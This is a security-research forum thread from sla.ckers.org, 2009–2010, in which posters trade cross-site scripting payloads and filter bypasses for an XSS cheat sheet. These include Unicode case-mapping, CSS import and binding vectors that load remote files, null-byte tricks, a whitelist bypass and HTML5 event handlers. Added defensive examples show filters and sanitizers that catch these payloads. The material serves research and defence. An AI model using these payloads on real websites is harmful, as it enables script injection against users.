sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: New Version of the XSS Cheat Sheet
Posted by: nEUrOO
Date: August 15, 2009 04:28PM

@thornmaker yeah, add "Thornmaker, CISSP" in your signature :} -- be proud! it's okay you know...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: August 15, 2009 05:28PM

I think you should have a CISSP pride day

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New Version of the XSS Cheat Sheet
Posted by: nEUrOO
Date: August 15, 2009 05:52PM

i don't want to see thornmaker dancing almost naked in the street with his CISSP certif folded in fig leaf... O_o

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: New Version of the XSS Cheat Sheet
Posted by: sirdarckcat
Date: August 15, 2009 11:07PM

oh god..

dross and jeremiah are also CISSP iirc heh

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: New Version of the XSS Cheat Sheet
Posted by: sirdarckcat
Date: August 16, 2009 09:54PM

Oh, this is not very well known, so...

<&#383;cript>

changes to <SCRIPT> when:

"\u017fcript".toUpperCase()

unicode for the win!

credit goes to chris weber that guy rocks..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 08/16/2009 09:55PM by sirdarckcat.

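The case-mapping trick in sirdarckcat's post, seen from the filter writer's side. This is an added example and not part of any post in the thread: the probe string, the two checks and `escapeHtml` are constructed here; `toUpperCase()` and `normalize("NFKC")` are standard JavaScript string methods.

```javascript
// Added example, not from the thread: a keyword filter that folds case its
// own way misses U+017F (LATIN SMALL LETTER LONG S), because toUpperCase()
// maps that character to a plain "S" while toLowerCase() leaves it alone.
const LONG_S = "\u017f";
// Constructed probe mirroring the post: "<" + long s + "cript>".
const PROBE = "<" + LONG_S + "cript>";

// Naive blacklist: lower-cases, then looks for "<script". The probe passes.
function naiveBlocks(input) {
  return input.toLowerCase().includes("<script");
}

// Hardened check: fold the way a downstream consumer might (upper-case
// first) and also under NFKC, which maps U+017F to "s"; test both forms.
function hardenedBlocks(input) {
  const upperThenLower = input.toUpperCase().toLowerCase();
  const nfkc = input.normalize("NFKC").toLowerCase();
  return upperThenLower.includes("<script") || nfkc.includes("<script");
}

// The durable fix is not a better blacklist but contextual output encoding:
// once "<" and ">" are entities, no case mapping can turn them into a tag.
function escapeHtml(input) {
  return input.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Stand-alone demo.
console.log(PROBE.toUpperCase());   // <SCRIPT>
console.log(naiveBlocks(PROBE));    // false
console.log(hardenedBlocks(PROBE)); // true
console.log(escapeHtml(PROBE));     // "&lt;" + long s + "cript&gt;"
```
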
n
Posted by: Anonymous User
Date: September 07, 2009 05:20AM

o



Edited 1 time(s). Last edit at 10/16/2009 03:25AM by philip_clarke.

Re: New Version of the XSS Cheat Sheet
Posted by: LeverOne
Date: March 04, 2010 01:41AM

Continue!

1.
Quote
ha.ckers.org/xss2.html
<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">

The power of this vector is still not fully identified and it generates questions. This should be replaced by
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="alert('XSS')">
or better
<P STYLE="behavior:url('#default#time2')" onBegin="alert('XSS')">
.

I already wrote about this.

2.
Quote
ha.ckers.org/xss2.html

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>@im\port'ht\tp://ha.c\kers.org/xss-retest.css';</STYLE>

Need to add:

<STYLE>a{background:url('s1' 's2)}@import javascript:alert(1);');}</STYLE>
// IE 6


or better

<STYLE>a{background:url('s1' 's2)}@import url(http://ha.ckers.org/xss.css);');}</STYLE>
// IE 6-8 (breaking out of css-string + rules after something)


to your taste...

3.
Quote
ha.ckers.org/xss2.html
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

It should be replaced with:

<STYLE>BODY{property:"
invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);"}</STYLE>
//FF 3.6 + breaking out of css-string


or better

<body style="property:'&#10invalid;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);'">


4.
Quote
ha.ckers.org/xss2.html
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
// IE (in tag)

perl -e 'print "<IMG SRC=\"\" o\0nerror=alert(\"XSS\")>";' > out
// IE (in attribute)

Need to add:

perl -e 'print "<IMG\0zzz SRC=\"\" onerror\0zzz=alert(\"XSS\")>";' > out
// GC 4 & Safari 4.0.4 (right side (after \0) in the tagname and attribute is ignored, but left side is valid)


And the logical conclusion:

perl -e 'print "<IMG STYLE=xss:expr/\0*XSS*\0/ession(alert(\"XSS\"))>";' > out
// IE (in parameter, bypass filtering comments). This comment is also valid in GC & Safari if the stylesheet is inside "<style>".



@all, the show must go on!!!


P.S.
Quote
rsnake
Posted by: rsnake
Date: August 10, 2009

Quote
ha.ckers.org/xss2.html
Check back in a week or two!

:D:D:D


upd1: @Gareth, nice! haha :)) Yep, <imitation>I'll do my own</imitation>


LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 03/04/2010 03:18AM by LeverOne.

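Filter hardening for the null-byte and comment-splitting vectors in LeverOne's post, as an added example that is not part of the original post. The samples are constructed here, modelled on the post; the verdict strings and regexes are this example's own.

```javascript
// Added example, not from the thread: the null-byte vectors work because the
// browser ignores the part of a tag or attribute name after \0 while a regex
// filter sees one odd name. Reject control characters up front, and strip
// CSS comments before looking for expression(), since IE reads
// expr/*..*/ession as "expression" with a comment in the middle.
const SAMPLES = {
  nulTag: '<IMG\0zzz SRC="" onerror\0zzz=alert("XSS")>',
  nulComment: '<IMG STYLE=xss:expr/\0*XSS*\0/ession(alert("XSS"))>',
  cssComment: '<IMG STYLE="xss:expr/*XSS*/ession(alert(1))">',
  benign: '<img src="x.png" alt="logo">',
};

// Naive filter: looks for "on<word>=" handlers and a literal "expression(".
function naiveFlags(html) {
  return /\son[a-z]+\s*=/i.test(html) || /expression\s*\(/i.test(html);
}

// Hardened filter: (1) any C0 control byte other than \t \n \r is rejected
// outright; (2) CSS comments are removed before keyword matching.
const CONTROL_CHARS = /[\x00-\x08\x0b\x0c\x0e-\x1f]/;

function stripCssComments(s) {
  return s.replace(/\/\*[\s\S]*?\*\//g, "");
}

function hardenedVerdict(html) {
  if (CONTROL_CHARS.test(html)) return "reject: control character";
  const cleaned = stripCssComments(html);
  if (/\son[a-z]+\s*=/i.test(cleaned)) return "reject: event handler";
  if (/expression\s*\(/i.test(cleaned)) return "reject: css expression";
  return "allow";
}

// Stand-alone demo: the naive filter passes all three malicious samples.
for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, "naive:", naiveFlags(html), "hardened:", hardenedVerdict(html));
}
```
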
Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: March 04, 2010 02:50AM

@LeverOne

<sarcasm>I'm sorry, your vectors contain a single quote; this is already on the cheatsheet, we don't include vectors that can be made using elements of previous vectors.......</sarcasm>


<praise>
Nice vectors! I like your CSS break out
</praise>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/04/2010 02:51AM by Gareth Heyes.

Re: New Version of the XSS Cheat Sheet
Posted by: Kyo
Date: March 15, 2010 04:20AM

Am I late to the party?

whitelist bypassing;


<img src= alt=" onerror=alert(1)//">



Edited 1 time(s). Last edit at 03/15/2010 04:21AM by Kyo.

Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: March 15, 2010 04:48AM

@Kyo

Nice idea that actually, but any good whitelist will either drop the src or rewrite it. Still nice vector though

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New Version of the XSS Cheat Sheet
Posted by: Kyo
Date: March 15, 2010 06:31AM

It's helped me at least once :)

Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: March 17, 2010 03:42PM

What about this one? Works on IE8 and IE9

<style>@import'vb\script:alert(1)</style>



Edited 1 time(s). Last edit at 03/17/2010 03:43PM by .mario.

Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: April 22, 2010 04:16PM

Despite the assumption the XSS cheat sheet has other purposes than being an XSS cheat sheet - here's some new meat (all Gecko based user agents):

<meta charset="x-imap4-modified-utf7"&&>&&<script&&>alert(1)&&;&&<&&/script&&>

Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: April 22, 2010 05:49PM

That's pretty cool

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: April 26, 2010 02:09PM

Okay - it's on!

http://code.google.com/p/html5security/

http://code.google.com/p/html5security/source/browse/#svn/trunk

Re: New Version of the XSS Cheat Sheet
Posted by: Gareth Heyes
Date: April 26, 2010 03:20PM

@mario

Sweeeeeeet

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: April 27, 2010 08:04AM

@mario

Why onfocus & onblur? or the other list of inline events and style for that matter? they are already known right?

Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: April 27, 2010 08:20AM

@Skyphire: onfocus and onblur usually require user interaction - with HTML5 autofocus attributes they don't anymore.

Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: April 27, 2010 05:56PM

Oh my... "Autofocus" *sigh* there we go. Didn't know about that, cool actually. It brings some more logic to HTML. I wonder if we can bubble the focus to another element this way, then we might have some cool file stealer going on. ;)

Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: April 30, 2010 04:32PM

So - after adding almost 30 vectors it's time to show where and how the action happens (don't bookmark - the domain will change and I will keep u posted)

http://heideri.ch/jso/

No SEO, no jizz nor goo - just an attempt to create a place where this madness is being collected to be freely available for whatever you need it. Scanners, your own internal cheat sheet, ... up to you. You got a contribution? Ping me or one of the other project owners:

http://code.google.com/p/html5security/

More vectors coming tomorrow.

Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: May 21, 2010 10:56AM

New HTML5 event handler:
oninput=""

Browser test page: http://jsbin.com/efalu/7

Re: New Version of the XSS Cheat Sheet
Posted by: Anonymous User
Date: May 21, 2010 05:03PM

http://heideri.ch/jso/#86 Nice - found out during testing that Safari does autofocus too meanwhile - tsts

Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: May 22, 2010 07:20AM

onhashchange="event"

hehe.


Provided code by whatwg:


<!DOCTYPE HTML>
<html>
 <head>
  <title>onhashchange</title>
 </head>
 <body onload="update()" onhashchange="update()">
  <h1>onhashchange</h1>

  <p><a href="#a">AAAA</a> <a href="#b">BBBB</a></p>

  <p id=message>...</p>

  <script>

   function update() {
     if (location.hash) {
       var msg = location.hash.substr(1);
       document.getElementById('message').firstChild.data = msg;
     }
   }

  </script>

 </body>
</html>



Edited 1 time(s). Last edit at 05/22/2010 07:21AM by Skyphire.

Re: New Version of the XSS Cheat Sheet
Posted by: Skyphire
Date: May 22, 2010 07:44AM

Haven't checked these, but I'm sure there are a couple new ones.

    onafterprint
    onbeforeprint
    onbeforeunload
    onemptied
    ondurationchange
    onhashchange
    onmessage
    onoffline
    ononline
    onpagehide
    onplaying
    onpageshow
    oncanplay
    onpopstate
    onratechange
    onredo
    onresize
    onreset
    onstorage
    onseeking
    onsuspend
    onstalled
    onundo
    onunload
    onwebkitanimationiteration
    onwebkittransitionend



Edited 1 time(s). Last edit at 05/22/2010 07:48AM by Skyphire.

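One parser-based answer to Kyo's whitelist bypass, Gareth's "drop or rewrite src" reply, .mario's autofocus remark and Skyphire's growing list of on* handlers, as an added example that is not part of any post in the thread. The tokenizer, the policy function and the placeholder image path are this example's own.

```javascript
// Added example, not from the thread. Kyo's vector beats regex whitelists
// because they guess at quoting; the HTML tokenizer reads src's unquoted value
// as alt=" and then sees a real onerror attribute. Tokenizer and policy below
// are this example's own; the placeholder path is made up.
const KYO = '<img src= alt=" onerror=alert(1)//">';

// Regex "whitelist" extraction: only finds a harmless-looking alt attribute.
function regexAttrNames(tag) {
  return [...tag.matchAll(/(\w+)\s*=\s*"([^"]*)"/g)].map((m) => m[1].toLowerCase());
}

// Tokenizer with HTML's quoting rules: unquoted values run to whitespace,
// quoted values to the matching quote.
function tokenizeAttrs(tag) {
  const s = tag.replace(/^<\w+\s*/, "").replace(/\/?>$/, "");
  const attrs = [];
  let i = 0;
  while (i < s.length) {
    while (i < s.length && /\s/.test(s[i])) i++;
    if (i >= s.length) break;
    let name = "", value = "";
    while (i < s.length && !/[\s=]/.test(s[i])) name += s[i++];
    while (i < s.length && /\s/.test(s[i])) i++;
    if (s[i] === "=") {
      i++;
      while (i < s.length && /\s/.test(s[i])) i++;
      if (s[i] === '"' || s[i] === "'") {
        const q = s[i++];
        while (i < s.length && s[i] !== q) value += s[i++];
        i++;
      } else {
        while (i < s.length && !/\s/.test(s[i])) value += s[i++];
      }
    }
    attrs.push([name.toLowerCase(), value]);
  }
  return attrs;
}

// Policy: drop every on* attribute (no allowlist of "needs a click" handlers,
// since autofocus removes that need), rewrite src to a known-safe value,
// keep alt with its quotes encoded.
function sanitizeImg(tag) {
  const kept = [];
  for (const [name, value] of tokenizeAttrs(tag)) {
    if (name.startsWith("on")) continue;
    if (name === "src") kept.push('src="/safe/placeholder.png"');
    else if (name === "alt") kept.push('alt="' + value.replace(/"/g, "&quot;") + '"');
  }
  return "<img " + kept.join(" ") + ">";
}
```
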